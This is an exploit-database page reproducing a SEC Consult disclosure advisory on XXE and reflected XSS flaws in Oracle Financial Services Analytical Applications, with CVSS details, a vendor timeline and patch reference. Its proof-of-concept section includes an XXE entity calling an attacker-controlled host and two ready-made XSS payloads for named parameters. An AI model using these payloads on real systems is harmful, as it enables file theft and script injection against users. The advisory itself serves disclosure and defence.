Exploitalert - Database of Exploits

Oracle Financial Services Analytical Applications 7.3.5.x / 8.0.x XXE Injection / XSS

CVE	Category	Price	Severity
CVE-2018-2660	CWE-611	$5,000	High

Author	Risk	Exploitation Type	Date
John Doe	High	Remote	2018-01-24

CPE
cpe:cpe:/a:oracle:financial_services_analytical_applications:7.3.5

CVSS	EPSS	EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	None	PR	The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	Low	C	There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.
Integrity	Low	I	Modification of data is possible, but the attacker does not have control over what can be modified, or the extent of what the attacker can affect is limited. The data modified does not have a direct, serious impact on the system.
Availability	Low	A	There is reduced performance or interruptions in resource availability. However, the attacker does not have the ability to completely prevent access to the resources or services; the impact is limited.

https://cxsecurity.com/ascii/WLB-2018010256

Oracle Financial Services Analytical Applications 7.3.5.x / 8.0.x XXE Injection / XSS

SEC Consult Vulnerability Lab Security Advisory < 20180123-0 > ======================================================================= title: XXE & Reflected XSS product: Oracle Financial Services Analytical Applications vulnerable version: 7.3.5.x, 8.0.x fixed version: Oracle CPU January 2018 CVE number: CVE-2018-2660, CVE-2018-2661 impact: High homepage: http://www.oracle.com/us/products/applications/ financial-services/analytical-applications/index.html found: 2017-06-15 by: Mohammad Shah Bin Mohammad Esa, Samandeep Singh (Office Singapore) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Oracle is the unchallenged leader in Financial Services, with an integrated, best-in-class, end-to-end solution of intelligent software and powerful hardware designed to meet every financial service need." Source: http://www.oracle.com/us/products/applications/ financial-services/analytical-applications/index.html Business recommendation: ------------------------ By exploiting the XXE vulnerability, an attacker can get read access to the filesystem of the user's system using the OFSAA web application and thus obtain sensitive information from the system. It is also possible to bypass input validation checks in order to inject JavaScript code. SEC Consult recommends to immediately install the patched version. Furthermore, a thorough security review should be performed by security professionals to identify potential further security issues. Vulnerability overview/description: ----------------------------------- 1) XML eXternal Entity (XXE) Injection (CVE-2018-2660) The web application allows users to import XML files. An attacker can import a specially crafted XML file and exploit the XXE vulnerability within the application. 2) Reflected Cross Site Scripting (CVE-2018-2661) This vulnerability allows an unauthenticated user to inject malicious client side script which will be executed in the browser of a user if he visits the manipulated URL. Proof of concept: ----------------- 1) XML External Entity Injection (XXE) (CVE-2018-2660) For example, by importing the following XML code in the "Business Model Upload" function a connection request from the server to the attacker's system will be made. <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://[IP:port]/" >]><foo>&xxe;</foo> IP:port = IP address and port where the attacker is listening for connections Furthermore some files can be exfiltrated to remote servers via the techniques described in: https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf 2) Reflected Cross Site Scripting (CVE-2018-2661) The following parameters have been found to be vulnerable to reflected cross site scripting attacks. Furthermore, there are many more vulnerable parameters. The following payload shows a simple alert message box: URL : http://$DOMAIN/OFSAA/admin/PopupAlert_H5.jsp?winTitle= METHOD : GET PAYLOAD : winTitle=a%3C/title%3E%3Cimg%0A%20src=x%20onerror=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E URL : http://$DOMAIN/OFSAA/fsapps/common/MM_PageOpener_crossBrowser.jsp? url=fetchErrorMessages.action&infodom=OCBCOFSAASG&formCode=summarypage&errorMessage={62}~ METHOD : GET PAYLOAD : errorMessage={62}~%27;alert%0a(0);//&aType=DeleteConfirm Vulnerable / tested versions: ----------------------------- The following version has been tested which was the most recent one when the vulnerabilities were discovered: * Oracle Financial Services Analytical Applications 8.0.4.0.0 According to Oracle all versions 7.3.5.x and 8.0.x are affected before CPU January 2018. Vendor contact timeline: ------------------------ 2017-09-11: Contacting vendor through encrypted email ([email protected]) 2017-09-20: Vendor requested to postpone the release date 2018-01-13: Vendor informed that Critical Patch Update that includes fixes of reported issues will be released on 2018-01-16. CVE-2018-2660 & CVE-2018-2661 were assigned for the issues 2018-01-23: Public disclosure of advisory Solution: --------- Apply patch update in the January 2018 Critical Patch Update: http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html Workaround: ----------- None Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF M. Shah / @2018

Impressum